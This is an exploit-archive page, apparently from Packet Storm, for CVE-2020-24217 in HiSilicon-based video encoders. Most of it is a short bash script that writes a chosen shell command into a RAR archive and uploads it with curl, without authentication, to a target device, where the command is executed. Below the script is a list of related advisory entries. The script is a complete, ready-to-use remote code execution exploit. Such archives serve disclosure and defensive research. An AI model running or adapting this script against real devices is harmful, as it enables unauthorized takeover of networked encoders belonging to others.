Lucene search
Alexei KojenovPACKETSTORM:159599HistoryOct 19, 2020 - 12:00 a.m.
HiSilicon Video Encoder Malicious Firmware Code Execution
2020-10-1900:00:00
Alexei Kojenov
packetstormsecurity.com
236
0.033 Low
EPSS
Percentile
91.4%
`#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
printf "uploading the RAR file... "
if curl -s -F '[email protected]' http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
rm uk.rar
else
echo "ERROR: $?"
fi
`
Related
cve
cve
CVE-2020-24217
2020-10-06 14:15:12
checkpoint_advisories
checkpoint_advisories
Szuray Video Encoder Firmware Command Injection (CVE-2020-24217)
2020-11-11 00:00:00
prion
prion
Command injection
2020-10-06 14:15:00
nvd
nvd
CVE-2020-24217
2020-10-06 14:15:12
packetstorm
packetstorm
HiSilicon Video Encoder Command Injection
2020-10-19 00:00:00
cvelist
cvelist
CVE-2020-24217
2020-10-06 13:05:36
exploitdb
exploitdb
HiSilicon Video Encoders - RCE via unauthenticated command injection
2020-10-19 00:00:00
cert
cert
IPTV encoder devices contain multiple vulnerabilities
2020-09-15 00:00:00